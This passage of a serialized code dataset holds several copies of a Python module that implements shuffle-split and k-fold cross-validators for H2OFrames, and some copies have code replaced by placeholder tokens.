H2OStratifiedShuffleSplit(H2OBaseShuffleSplit):\n \"\"\"Shuffle splitter used for ``h2o_train_test_split`` when stratified\n option is specified. This shuffle split class will perform stratification.\n \"\"\"\n\n def _iter_indices(self, frame, y):\n \"\"\"Iterate the indices with stratification.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string\n The column to stratify.\n\n Returns\n -------\n\n train : np.ndarray, shape=(n_samples,)\n The train indices\n\n test : np.ndarray, shape=(n_samples,)\n The test indices\n \"\"\"\n n_samples = frame.shape[0]\n n_train, n_test = _validate_shuffle_split(n_samples, self.test_size,\n self.train_size)\n y = _val_y(y)\n target = np.asarray(frame[y].as_data_frame(use_pandas=True)[y].tolist()\n )\n classes, y_indices = np.unique(target, return_inverse=True)\n n_classes = classes.shape[0]\n class_counts = bincount(y_indices)\n if np.min(class_counts) < 2:\n raise ValueError(\n 'The least populated class in y has only 1 member, which is too few. The minimum number of labels for any class cannot be less than 2.'\n )\n if n_train < n_classes:\n raise ValueError(\n 'The train_size=%d should be greater than or equal to the number of classes=%d'\n % (n_train, n_classes))\n if n_test < n_classes:\n raise ValueError(\n 'The test_size=%d should be greater than or equal to the number of classes=%d'\n % (n_test, n_classes))\n rng = check_random_state(self.random_state)\n p_i = class_counts / float(n_samples)\n n_i = np.round(n_train * p_i).astype(int)\n t_i = np.minimum(class_counts - n_i, np.round(n_test * p_i).astype(int)\n )\n for _ in range(self.n_splits):\n train = []\n test = []\n for i, class_i in enumerate(classes):\n permutation = rng.permutation(class_counts[i])\n perm_indices_class_i = np.where(target == class_i)[0][\n permutation]\n train.extend(perm_indices_class_i[:n_i[i]])\n test.extend(perm_indices_class_i[n_i[i]:n_i[i] + t_i[i]])\n if len(train) + len(test) < n_train + n_test:\n missing_indices = np.where(bincount(train + test, minlength\n =len(target)) == 0)[0]\n missing_indices = rng.permutation(missing_indices)\n n_missing_train = n_train - len(train)\n n_missing_test = n_test - len(test)\n if n_missing_train > 0:\n train.extend(missing_indices[:n_missing_train])\n if n_missing_test > 0:\n test.extend(missing_indices[-n_missing_test:])\n train = rng.permutation(train)\n test = rng.permutation(test)\n yield train, test\n\n def split(self, frame, y):\n \"\"\"Split the frame with stratification.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string\n The column to stratify.\n \"\"\"\n return super(H2OStratifiedShuffleSplit, self).split(frame, y)\n\n\nclass _H2OBaseKFold(six.with_metaclass(ABCMeta, H2OBaseCrossValidator)):\n \"\"\"Base class for KFold and Stratified KFold.\n \n Parameters\n ----------\n\n n_folds : int\n The number of splits\n\n shuffle : bool\n Whether to shuffle indices\n\n random_state : int or RandomState\n The random state for the split\n \"\"\"\n\n @abstractmethod\n def __init__(self, n_folds, shuffle, random_state):\n if not isinstance(n_folds, numbers.Integral):\n raise ValueError(\n 'n_folds must be of Integral type. %s of type %s was passed' %\n (n_folds, type(n_folds)))\n n_folds = int(n_folds)\n if n_folds <= 1:\n raise ValueError(\n 'k-fold cross-validation requires at least one train/test split by setting n_folds=2 or more'\n )\n if shuffle not in [True, False]:\n raise TypeError(\n 'shuffle must be True or False. Got %s (type=%s)' % (str(\n shuffle), type(shuffle)))\n self.n_folds = n_folds\n self.shuffle = shuffle\n self.random_state = random_state\n\n @overrides(H2OBaseCrossValidator)\n def split(self, frame, y=None):\n \"\"\"Split the frame.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string, optional (default=None)\n The column to stratify.\n \"\"\"\n frame = check_frame(frame, copy=False)\n n_obs = frame.shape[0]\n if self.n_folds > n_obs:\n raise ValueError('Cannot have n_folds greater than n_obs')\n for train, test in super(_H2OBaseKFold, self).split(frame, y):\n yield train, test\n\n @overrides(H2OBaseCrossValidator)\n def get_n_splits(self):\n \"\"\"Get the number of splits or folds.\n\n Returns\n -------\n\n n_folds : int\n The number of folds\n \"\"\"\n return self.n_folds\n\n\nclass H2OKFold(_H2OBaseKFold):\n \"\"\"K-folds cross-validator for an H2OFrame.\n \n Parameters\n ----------\n\n n_folds : int, optional (default=3)\n The number of splits\n\n shuffle : bool, optional (default=False)\n Whether to shuffle indices\n\n random_state : int or RandomState, optional (default=None)\n The random state for the split\n \"\"\"\n\n def __init__(self, n_folds=3, shuffle=False, random_state=None):\n super(H2OKFold, self).__init__(n_folds, shuffle, random_state)\n\n @overrides(_H2OBaseKFold)\n def _iter_test_indices(self, frame, y=None):\n n_obs = frame.shape[0]\n indices = np.arange(n_obs)\n if self.shuffle:\n check_random_state(self.random_state).shuffle(indices)\n n_folds = self.n_folds\n fold_sizes = n_obs // n_folds * np.ones(n_folds, dtype=np.int)\n fold_sizes[:n_obs % n_folds] += 1\n current = 0\n for fold_size in fold_sizes:\n start, stop = current, current + fold_size\n yield indices[start:stop]\n current = stop\n\n\nclass H2OStratifiedKFold(_H2OBaseKFold):\n \"\"\"K-folds cross-validator for an H2OFrame with\n stratified splits.\n \n Parameters\n ----------\n\n n_folds : int, optional (default=3)\n The number of splits\n\n shuffle : bool, optional (default=False)\n Whether to shuffle indices\n\n random_state : int or RandomState, optional (default=None)\n The random state for the split\n \"\"\"\n\n def __init__(self, n_folds=3, shuffle=False, random_state=None):\n super(H2OStratifiedKFold, self).__init__(n_folds, shuffle, random_state\n )\n\n def split(self, frame, y):\n \"\"\"Split the frame with stratification.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string\n The column to stratify.\n \"\"\"\n return super(H2OStratifiedKFold, self).split(frame, y)\n\n def _iter_test_masks(self, frame, y):\n test_folds = self._make_test_folds(frame, y)\n for i in range(self.n_folds):\n yield test_folds == i\n\n def _make_test_folds(self, frame, y):\n if self.shuffle:\n rng = check_random_state(self.random_state)\n else:\n rng = self.random_state\n y = _val_y(y)\n if y is None:\n raise ValueError(\n 'H2OStratifiedKFold requires a target name (got None)')\n target = frame[y].as_data_frame(use_pandas=True)[y].values\n n_samples = target.shape[0]\n unique_y, y_inversed = np.unique(target, return_inverse=True)\n y_counts = bincount(y_inversed)\n min_labels = np.min(y_counts)\n if np.all(self.n_folds > y_counts):\n raise ValueError(\n 'All the n_labels for individual classes are less than %d folds.'\n % self.n_folds, Warning)\n if self.n_folds > min_labels:\n warnings.warn(\n 'The least populated class in y has only %d members, which is too few. The minimum number of labels for any class cannot be less than n_folds=%d.'\n % (min_labels, self.n_folds), Warning)\n if SK18:\n per_cls_cvs = [KFold(self.n_folds, shuffle=self.shuffle,\n random_state=rng).split(np.zeros(max(count, self.n_folds))) for\n count in y_counts]\n else:\n per_cls_cvs = [KFold(max(count, self.n_folds), self.n_folds,\n shuffle=self.shuffle, random_state=rng) for count in y_counts]\n test_folds = np.zeros(n_samples, dtype=np.int)\n for test_fold_indices, per_cls_splits in enumerate(zip(*per_cls_cvs)):\n for cls, (_, test_split) in zip(unique_y, per_cls_splits):\n cls_test_folds = test_folds[target == cls]\n test_split = test_split[test_split < len(cls_test_folds)]\n cls_test_folds[test_split] = test_fold_indices\n test_folds[target == cls] = cls_test_folds\n return test_folds\n", "<import token>\n<code token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n<assignment token>\n<function token>\n\n\nclass H2OBaseCrossValidator(six.with_metaclass(ABCMeta)):\n <docstring token>\n\n def __init__(self):\n pass\n\n def split(self, frame, y=None):\n \"\"\"Generate indices to split data into training and test.\n\n Parameters\n ----------\n\n frame : ``H2OFrame``\n The h2o frame to split\n\n y : str, optional (default=None)\n The name of the column to stratify, if applicable.\n\n Returns\n -------\n\n train : ndarray\n The training set indices for the split\n\n test : ndarray\n The testing set indices for that split\n \"\"\"\n frame = check_frame(frame, copy=False)\n indices = np.arange(frame.shape[0])\n for test_index in self._iter_test_masks(frame, y):\n train_index = indices[np.logical_not(test_index)]\n test_index = indices[test_index]\n yield list(train_index), list(test_index)\n\n def _iter_test_masks(self, frame, y=None):\n \"\"\"Generates boolean masks corresponding to the tests set.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The h2o frame to split\n\n y : string, optional (default=None)\n The column to stratify.\n\n Returns\n -------\n\n test_mask : np.ndarray, shape=(n_samples,)\n The indices for the test split\n \"\"\"\n for test_index in self._iter_test_indices(frame, y):\n test_mask = np.zeros(frame.shape[0], dtype=np.bool)\n test_mask[test_index] = True\n yield test_mask\n\n def _iter_test_indices(self, frame, y=None):\n raise NotImplementedError(\n 'this method must be implemented by a subclass')\n\n @abstractmethod\n def get_n_splits(self):\n \"\"\"Get the number of splits or folds for\n this instance of the cross validator.\n \"\"\"\n pass\n\n def __repr__(self):\n return _build_repr(self)\n\n\n<function token>\n<function token>\n\n\nclass H2OBaseShuffleSplit(six.with_metaclass(ABCMeta)):\n \"\"\"Base class for H2OShuffleSplit and H2OStratifiedShuffleSplit. This\n is used for ``h2o_train_test_split`` in strategic train/test splits of\n H2OFrames. Implementing subclasses should override ``_iter_indices``.\n\n Parameters\n ----------\n\n n_splits : int, optional (default=2)\n The number of folds or splits in the split\n\n test_size : float or int, optional (default=0.1)\n The ratio of observations for the test fold\n\n train_size : float or int, optional (default=None)\n The ratio of observations for the train fold \n\n random_state : int or RandomState, optional (default=None)\n The random state for duplicative purposes. \n \"\"\"\n\n def __init__(self, n_splits=2, test_size=0.1, train_size=None,\n random_state=None):\n _validate_shuffle_split_init(test_size, train_size)\n self.n_splits = n_splits\n self.test_size = test_size\n self.train_size = train_size\n self.random_state = random_state\n\n def split(self, frame, y=None):\n \"\"\"Split the frame.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string, optional (default=None)\n The column to stratify.\n \"\"\"\n for train, test in self._iter_indices(frame, y):\n yield train, test\n\n @abstractmethod\n def _iter_indices(self, frame, y):\n \"\"\"Abstract method for iterating the indices.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string, optional (default=None)\n The column to stratify.\n \"\"\"\n pass\n\n def get_n_splits(self):\n \"\"\"Get the number of splits or folds for\n this instance of the shuffle split.\n \"\"\"\n return self.n_splits\n\n def __repr__(self):\n return _build_repr(self)\n\n\nclass H2OShuffleSplit(H2OBaseShuffleSplit):\n \"\"\"Default shuffle splitter used for ``h2o_train_test_split``.\n This shuffle split class will not perform any stratification, and\n will simply shuffle indices and split into the number of specified\n sub-frames.\n \"\"\"\n\n def _iter_indices(self, frame, y=None):\n \"\"\"Iterate the indices.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string, optional (default=None)\n The column to stratify. Since this class does\n not perform stratification, ``y`` is unused.\n\n Returns\n -------\n\n ind_train : np.ndarray, shape=(n_samples,)\n The train indices\n\n ind_test : np.ndarray, shape=(n_samples,)\n The test indices\n \"\"\"\n n_samples = frame.shape[0]\n n_train, n_test = _validate_shuffle_split(n_samples, self.test_size,\n self.train_size)\n rng = check_random_state(self.random_state)\n for i in range(self.n_splits):\n permutation = rng.permutation(n_samples)\n ind_test = permutation[:n_test]\n ind_train = permutation[n_test:n_test + n_train]\n yield ind_train, ind_test\n\n\nclass H2OStratifiedShuffleSplit(H2OBaseShuffleSplit):\n \"\"\"Shuffle splitter used for ``h2o_train_test_split`` when stratified\n option is specified. This shuffle split class will perform stratification.\n \"\"\"\n\n def _iter_indices(self, frame, y):\n \"\"\"Iterate the indices with stratification.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string\n The column to stratify.\n\n Returns\n -------\n\n train : np.ndarray, shape=(n_samples,)\n The train indices\n\n test : np.ndarray, shape=(n_samples,)\n The test indices\n \"\"\"\n n_samples = frame.shape[0]\n n_train, n_test = _validate_shuffle_split(n_samples, self.test_size,\n self.train_size)\n y = _val_y(y)\n target = np.asarray(frame[y].as_data_frame(use_pandas=True)[y].tolist()\n )\n classes, y_indices = np.unique(target, return_inverse=True)\n n_classes = classes.shape[0]\n class_counts = bincount(y_indices)\n if np.min(class_counts) < 2:\n raise ValueError(\n 'The least populated class in y has only 1 member, which is too few. The minimum number of labels for any class cannot be less than 2.'\n )\n if n_train < n_classes:\n raise ValueError(\n 'The train_size=%d should be greater than or equal to the number of classes=%d'\n % (n_train, n_classes))\n if n_test < n_classes:\n raise ValueError(\n 'The test_size=%d should be greater than or equal to the number of classes=%d'\n % (n_test, n_classes))\n rng = check_random_state(self.random_state)\n p_i = class_counts / float(n_samples)\n n_i = np.round(n_train * p_i).astype(int)\n t_i = np.minimum(class_counts - n_i, np.round(n_test * p_i).astype(int)\n )\n for _ in range(self.n_splits):\n train = []\n test = []\n for i, class_i in enumerate(classes):\n permutation = rng.permutation(class_counts[i])\n perm_indices_class_i = np.where(target == class_i)[0][\n permutation]\n train.extend(perm_indices_class_i[:n_i[i]])\n test.extend(perm_indices_class_i[n_i[i]:n_i[i] + t_i[i]])\n if len(train) + len(test) < n_train + n_test:\n missing_indices = np.where(bincount(train + test, minlength\n =len(target)) == 0)[0]\n missing_indices = rng.permutation(missing_indices)\n n_missing_train = n_train - len(train)\n n_missing_test = n_test - len(test)\n if n_missing_train > 0:\n train.extend(missing_indices[:n_missing_train])\n if n_missing_test > 0:\n test.extend(missing_indices[-n_missing_test:])\n train = rng.permutation(train)\n test = rng.permutation(test)\n yield train, test\n\n def split(self, frame, y):\n \"\"\"Split the frame with stratification.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string\n The column to stratify.\n \"\"\"\n return super(H2OStratifiedShuffleSplit, self).split(frame, y)\n\n\nclass _H2OBaseKFold(six.with_metaclass(ABCMeta, H2OBaseCrossValidator)):\n \"\"\"Base class for KFold and Stratified KFold.\n \n Parameters\n ----------\n\n n_folds : int\n The number of splits\n\n shuffle : bool\n Whether to shuffle indices\n\n random_state : int or RandomState\n The random state for the split\n \"\"\"\n\n @abstractmethod\n def __init__(self, n_folds, shuffle, random_state):\n if not isinstance(n_folds, numbers.Integral):\n raise ValueError(\n 'n_folds must be of Integral type. %s of type %s was passed' %\n (n_folds, type(n_folds)))\n n_folds = int(n_folds)\n if n_folds <= 1:\n raise ValueError(\n 'k-fold cross-validation requires at least one train/test split by setting n_folds=2 or more'\n )\n if shuffle not in [True, False]:\n raise TypeError(\n 'shuffle must be True or False. Got %s (type=%s)' % (str(\n shuffle), type(shuffle)))\n self.n_folds = n_folds\n self.shuffle = shuffle\n self.random_state = random_state\n\n @overrides(H2OBaseCrossValidator)\n def split(self, frame, y=None):\n \"\"\"Split the frame.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string, optional (default=None)\n The column to stratify.\n \"\"\"\n frame = check_frame(frame, copy=False)\n n_obs = frame.shape[0]\n if self.n_folds > n_obs:\n raise ValueError('Cannot have n_folds greater than n_obs')\n for train, test in super(_H2OBaseKFold, self).split(frame, y):\n yield train, test\n\n @overrides(H2OBaseCrossValidator)\n def get_n_splits(self):\n \"\"\"Get the number of splits or folds.\n\n Returns\n -------\n\n n_folds : int\n The number of folds\n \"\"\"\n return self.n_folds\n\n\nclass H2OKFold(_H2OBaseKFold):\n \"\"\"K-folds cross-validator for an H2OFrame.\n \n Parameters\n ----------\n\n n_folds : int, optional (default=3)\n The number of splits\n\n shuffle : bool, optional (default=False)\n Whether to shuffle indices\n\n random_state : int or RandomState, optional (default=None)\n The random state for the split\n \"\"\"\n\n def __init__(self, n_folds=3, shuffle=False, random_state=None):\n super(H2OKFold, self).__init__(n_folds, shuffle, random_state)\n\n @overrides(_H2OBaseKFold)\n def _iter_test_indices(self, frame, y=None):\n n_obs = frame.shape[0]\n indices = np.arange(n_obs)\n if self.shuffle:\n check_random_state(self.random_state).shuffle(indices)\n n_folds = self.n_folds\n fold_sizes = n_obs // n_folds * np.ones(n_folds, dtype=np.int)\n fold_sizes[:n_obs % n_folds] += 1\n current = 0\n for fold_size in fold_sizes:\n start, stop = current, current + fold_size\n yield indices[start:stop]\n current = stop\n\n\nclass H2OStratifiedKFold(_H2OBaseKFold):\n \"\"\"K-folds cross-validator for an H2OFrame with\n stratified splits.\n \n Parameters\n ----------\n\n n_folds : int, optional (default=3)\n The number of splits\n\n shuffle : bool, optional (default=False)\n Whether to shuffle indices\n\n random_state : int or RandomState, optional (default=None)\n The random state for the split\n \"\"\"\n\n def __init__(self, n_folds=3, shuffle=False, random_state=None):\n super(H2OStratifiedKFold, self).__init__(n_folds, shuffle, random_state\n )\n\n def split(self, frame, y):\n \"\"\"Split the frame with stratification.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string\n The column to stratify.\n \"\"\"\n return super(H2OStratifiedKFold, self).split(frame, y)\n\n def _iter_test_masks(self, frame, y):\n test_folds = self._make_test_folds(frame, y)\n for i in range(self.n_folds):\n yield test_folds == i\n\n def _make_test_folds(self, frame, y):\n if self.shuffle:\n rng = check_random_state(self.random_state)\n else:\n rng = self.random_state\n y = _val_y(y)\n if y is None:\n raise ValueError(\n 'H2OStratifiedKFold requires a target name (got None)')\n target = frame[y].as_data_frame(use_pandas=True)[y].values\n n_samples = target.shape[0]\n unique_y, y_inversed = np.unique(target, return_inverse=True)\n y_counts = bincount(y_inversed)\n min_labels = np.min(y_counts)\n if np.all(self.n_folds > y_counts):\n raise ValueError(\n 'All the n_labels for individual classes are less than %d folds.'\n % self.n_folds, Warning)\n if self.n_folds > min_labels:\n warnings.warn(\n 'The least populated class in y has only %d members, which is too few. The minimum number of labels for any class cannot be less than n_folds=%d.'\n % (min_labels, self.n_folds), Warning)\n if SK18:\n per_cls_cvs = [KFold(self.n_folds, shuffle=self.shuffle,\n random_state=rng).split(np.zeros(max(count, self.n_folds))) for\n count in y_counts]\n else:\n per_cls_cvs = [KFold(max(count, self.n_folds), self.n_folds,\n shuffle=self.shuffle, random_state=rng) for count in y_counts]\n test_folds = np.zeros(n_samples, dtype=np.int)\n for test_fold_indices, per_cls_splits in enumerate(zip(*per_cls_cvs)):\n for cls, (_, test_split) in zip(unique_y, per_cls_splits):\n cls_test_folds = test_folds[target == cls]\n test_split = test_split[test_split < len(cls_test_folds)]\n cls_test_folds[test_split] = test_fold_indices\n test_folds[target == cls] = cls_test_folds\n return test_folds\n", "<import token>\n<code token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n<assignment token>\n<function token>\n\n\nclass H2OBaseCrossValidator(six.with_metaclass(ABCMeta)):\n <docstring token>\n <function token>\n\n def split(self, frame, y=None):\n \"\"\"Generate indices to split data into training and test.\n\n Parameters\n ----------\n\n frame : ``H2OFrame``\n The h2o frame to split\n\n y : str, optional (default=None)\n The name of the column to stratify, if applicable.\n\n Returns\n -------\n\n train : ndarray\n The training set indices for the split\n\n test : ndarray\n The testing set indices for that split\n \"\"\"\n frame = check_frame(frame, copy=False)\n indices = np.arange(frame.shape[0])\n for test_index in self._iter_test_masks(frame, y):\n train_index = indices[np.logical_not(test_index)]\n test_index = indices[test_index]\n yield list(train_index), list(test_index)\n\n def _iter_test_masks(self, frame, y=None):\n \"\"\"Generates boolean masks corresponding to the tests set.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The h2o frame to split\n\n y : string, optional (default=None)\n The column to stratify.\n\n Returns\n -------\n\n test_mask : np.ndarray, shape=(n_samples,)\n The indices for the test split\n \"\"\"\n for test_index in self._iter_test_indices(frame, y):\n test_mask = np.zeros(frame.shape[0], dtype=np.bool)\n test_mask[test_index] = True\n yield test_mask\n\n def _iter_test_indices(self, frame, y=None):\n raise NotImplementedError(\n 'this method must be implemented by a subclass')\n\n @abstractmethod\n def get_n_splits(self):\n \"\"\"Get the number of splits or folds for\n this instance of the cross validator.\n \"\"\"\n pass\n\n def __repr__(self):\n return _build_repr(self)\n\n\n<function token>\n<function token>\n\n\nclass H2OBaseShuffleSplit(six.with_metaclass(ABCMeta)):\n \"\"\"Base class for H2OShuffleSplit and H2OStratifiedShuffleSplit. This\n is used for ``h2o_train_test_split`` in strategic train/test splits of\n H2OFrames. Implementing subclasses should override ``_iter_indices``.\n\n Parameters\n ----------\n\n n_splits : int, optional (default=2)\n The number of folds or splits in the split\n\n test_size : float or int, optional (default=0.1)\n The ratio of observations for the test fold\n\n train_size : float or int, optional (default=None)\n The ratio of observations for the train fold \n\n random_state : int or RandomState, optional (default=None)\n The random state for duplicative purposes. \n \"\"\"\n\n def __init__(self, n_splits=2, test_size=0.1, train_size=None,\n random_state=None):\n _validate_shuffle_split_init(test_size, train_size)\n self.n_splits = n_splits\n self.test_size = test_size\n self.train_size = train_size\n self.random_state = random_state\n\n def split(self, frame, y=None):\n \"\"\"Split the frame.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string, optional (default=None)\n The column to stratify.\n \"\"\"\n for train, test in self._iter_indices(frame, y):\n yield train, test\n\n @abstractmethod\n def _iter_indices(self, frame, y):\n \"\"\"Abstract method for iterating the indices.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string, optional (default=None)\n The column to stratify.\n \"\"\"\n pass\n\n def get_n_splits(self):\n \"\"\"Get the number of splits or folds for\n this instance of the shuffle split.\n \"\"\"\n return self.n_splits\n\n def __repr__(self):\n return _build_repr(self)\n\n\nclass H2OShuffleSplit(H2OBaseShuffleSplit):\n \"\"\"Default shuffle splitter used for ``h2o_train_test_split``.\n This shuffle split class will not perform any stratification, and\n will simply shuffle indices and split into the number of specified\n sub-frames.\n \"\"\"\n\n def _iter_indices(self, frame, y=None):\n \"\"\"Iterate the indices.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string, optional (default=None)\n The column to stratify. Since this class does\n not perform stratification, ``y`` is unused.\n\n Returns\n -------\n\n ind_train : np.ndarray, shape=(n_samples,)\n The train indices\n\n ind_test : np.ndarray, shape=(n_samples,)\n The test indices\n \"\"\"\n n_samples = frame.shape[0]\n n_train, n_test = _validate_shuffle_split(n_samples, self.test_size,\n self.train_size)\n rng = check_random_state(self.random_state)\n for i in range(self.n_splits):\n permutation = rng.permutation(n_samples)\n ind_test = permutation[:n_test]\n ind_train = permutation[n_test:n_test + n_train]\n yield ind_train, ind_test\n\n\nclass H2OStratifiedShuffleSplit(H2OBaseShuffleSplit):\n \"\"\"Shuffle splitter used for ``h2o_train_test_split`` when stratified\n option is specified. This shuffle split class will perform stratification.\n \"\"\"\n\n def _iter_indices(self, frame, y):\n \"\"\"Iterate the indices with stratification.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string\n The column to stratify.\n\n Returns\n -------\n\n train : np.ndarray, shape=(n_samples,)\n The train indices\n\n test : np.ndarray, shape=(n_samples,)\n The test indices\n \"\"\"\n n_samples = frame.shape[0]\n n_train, n_test = _validate_shuffle_split(n_samples, self.test_size,\n self.train_size)\n y = _val_y(y)\n target = np.asarray(frame[y].as_data_frame(use_pandas=True)[y].tolist()\n )\n classes, y_indices = np.unique(target, return_inverse=True)\n n_classes = classes.shape[0]\n class_counts = bincount(y_indices)\n if np.min(class_counts) < 2:\n raise ValueError(\n 'The least populated class in y has only 1 member, which is too few. The minimum number of labels for any class cannot be less than 2.'\n )\n if n_train < n_classes:\n raise ValueError(\n 'The train_size=%d should be greater than or equal to the number of classes=%d'\n % (n_train, n_classes))\n if n_test < n_classes:\n raise ValueError(\n 'The test_size=%d should be greater than or equal to the number of classes=%d'\n % (n_test, n_classes))\n rng = check_random_state(self.random_state)\n p_i = class_counts / float(n_samples)\n n_i = np.round(n_train * p_i).astype(int)\n t_i = np.minimum(class_counts - n_i, np.round(n_test * p_i).astype(int)\n )\n for _ in range(self.n_splits):\n train = []\n test = []\n for i, class_i in enumerate(classes):\n permutation = rng.permutation(class_counts[i])\n perm_indices_class_i = np.where(target == class_i)[0][\n permutation]\n train.extend(perm_indices_class_i[:n_i[i]])\n test.extend(perm_indices_class_i[n_i[i]:n_i[i] + t_i[i]])\n if len(train) + len(test) < n_train + n_test:\n missing_indices = np.where(bincount(train + test, minlength\n =len(target)) == 0)[0]\n missing_indices = rng.permutation(missing_indices)\n n_missing_train = n_train - len(train)\n n_missing_test = n_test - len(test)\n if n_missing_train > 0:\n train.extend(missing_indices[:n_missing_train])\n if n_missing_test > 0:\n test.extend(missing_indices[-n_missing_test:])\n train = rng.permutation(train)\n test = rng.permutation(test)\n yield train, test\n\n def split(self, frame, y):\n \"\"\"Split the frame with stratification.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string\n The column to stratify.\n \"\"\"\n return super(H2OStratifiedShuffleSplit, self).split(frame, y)\n\n\nclass _H2OBaseKFold(six.with_metaclass(ABCMeta, H2OBaseCrossValidator)):\n \"\"\"Base class for KFold and Stratified KFold.\n \n Parameters\n ----------\n\n n_folds : int\n The number of splits\n\n shuffle : bool\n Whether to shuffle indices\n\n random_state : int or RandomState\n The random state for the split\n \"\"\"\n\n @abstractmethod\n def __init__(self, n_folds, shuffle, random_state):\n if not isinstance(n_folds, numbers.Integral):\n raise ValueError(\n 'n_folds must be of Integral type. %s of type %s was passed' %\n (n_folds, type(n_folds)))\n n_folds = int(n_folds)\n if n_folds <= 1:\n raise ValueError(\n 'k-fold cross-validation requires at least one train/test split by setting n_folds=2 or more'\n )\n if shuffle not in [True, False]:\n raise TypeError(\n 'shuffle must be True or False. Got %s (type=%s)' % (str(\n shuffle), type(shuffle)))\n self.n_folds = n_folds\n self.shuffle = shuffle\n self.random_state = random_state\n\n @overrides(H2OBaseCrossValidator)\n def split(self, frame, y=None):\n \"\"\"Split the frame.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string, optional (default=None)\n The column to stratify.\n \"\"\"\n frame = check_frame(frame, copy=False)\n n_obs = frame.shape[0]\n if self.n_folds > n_obs:\n raise ValueError('Cannot have n_folds greater than n_obs')\n for train, test in super(_H2OBaseKFold, self).split(frame, y):\n yield train, test\n\n @overrides(H2OBaseCrossValidator)\n def get_n_splits(self):\n \"\"\"Get the number of splits or folds.\n\n Returns\n -------\n\n n_folds : int\n The number of folds\n \"\"\"\n return self.n_folds\n\n\nclass H2OKFold(_H2OBaseKFold):\n \"\"\"K-folds cross-validator for an H2OFrame.\n \n Parameters\n ----------\n\n n_folds : int, optional (default=3)\n The number of splits\n\n shuffle : bool, optional (default=False)\n Whether to shuffle indices\n\n random_state : int or RandomState, optional (default=None)\n The random state for the split\n \"\"\"\n\n def __init__(self, n_folds=3, shuffle=False, random_state=None):\n super(H2OKFold, self).__init__(n_folds, shuffle, random_state)\n\n @overrides(_H2OBaseKFold)\n def _iter_test_indices(self, frame, y=None):\n n_obs = frame.shape[0]\n indices = np.arange(n_obs)\n if self.shuffle:\n check_random_state(self.random_state).shuffle(indices)\n n_folds = self.n_folds\n fold_sizes = n_obs // n_folds * np.ones(n_folds, dtype=np.int)\n fold_sizes[:n_obs % n_folds] += 1\n current = 0\n for fold_size in fold_sizes:\n start, stop = current, current + fold_size\n yield indices[start:stop]\n current = stop\n\n\nclass H2OStratifiedKFold(_H2OBaseKFold):\n \"\"\"K-folds cross-validator for an H2OFrame with\n stratified splits.\n \n Parameters\n ----------\n\n n_folds : int, optional (default=3)\n The number of splits\n\n shuffle : bool, optional (default=False)\n Whether to shuffle indices\n\n random_state : int or RandomState, optional (default=None)\n The random state for the split\n \"\"\"\n\n def __init__(self, n_folds=3, shuffle=False, random_state=None):\n super(H2OStratifiedKFold, self).__init__(n_folds, shuffle, random_state\n )\n\n def split(self, frame, y):\n \"\"\"Split the frame with stratification.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string\n The column to stratify.\n \"\"\"\n return super(H2OStratifiedKFold, self).split(frame, y)\n\n def _iter_test_masks(self, frame, y):\n test_folds = self._make_test_folds(frame, y)\n for i in range(self.n_folds):\n yield test_folds == i\n\n def _make_test_folds(self, frame, y):\n if self.shuffle:\n rng = check_random_state(self.random_state)\n else:\n rng = self.random_state\n y = _val_y(y)\n if y is None:\n raise ValueError(\n 'H2OStratifiedKFold requires a target name (got None)')\n target = frame[y].as_data_frame(use_pandas=True)[y].values\n n_samples = target.shape[0]\n unique_y, y_inversed = np.unique(target, return_inverse=True)\n y_counts = bincount(y_inversed)\n min_labels = np.min(y_counts)\n if np.all(self.n_folds > y_counts):\n raise ValueError(\n 'All the n_labels for individual classes are less than %d folds.'\n % self.n_folds, Warning)\n if self.n_folds > min_labels:\n warnings.warn(\n 'The least populated class in y has only %d members, which is too few. The minimum number of labels for any class cannot be less than n_folds=%d.'\n % (min_labels, self.n_folds), Warning)\n if SK18:\n per_cls_cvs = [KFold(self.n_folds, shuffle=self.shuffle,\n random_state=rng).split(np.zeros(max(count, self.n_folds))) for\n count in y_counts]\n else:\n per_cls_cvs = [KFold(max(count, self.n_folds), self.n_folds,\n shuffle=self.shuffle, random_state=rng) for count in y_counts]\n test_folds = np.zeros(n_samples, dtype=np.int)\n for test_fold_indices, per_cls_splits in enumerate(zip(*per_cls_cvs)):\n for cls, (_, test_split) in zip(unique_y, per_cls_splits):\n cls_test_folds = test_folds[target == cls]\n test_split = test_split[test_split < len(cls_test_folds)]\n cls_test_folds[test_split] = test_fold_indices\n test_folds[target == cls] = cls_test_folds\n return test_folds\n", "<import token>\n<code token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n<assignment token>\n<function token>\n\n\nclass H2OBaseCrossValidator(six.with_metaclass(ABCMeta)):\n <docstring token>\n <function token>\n\n def split(self, frame, y=None):\n \"\"\"Generate indices to split data into training and test.\n\n Parameters\n ----------\n\n frame : ``H2OFrame``\n The h2o frame to split\n\n y : str, optional (default=None)\n The name of the column to stratify, if applicable.\n\n Returns\n -------\n\n train : ndarray\n The training set indices for the split\n\n test : ndarray\n The testing set indices for that split\n \"\"\"\n frame = check_frame(frame, copy=False)\n indices = np.arange(frame.shape[0])\n for test_index in self._iter_test_masks(frame, y):\n train_index = 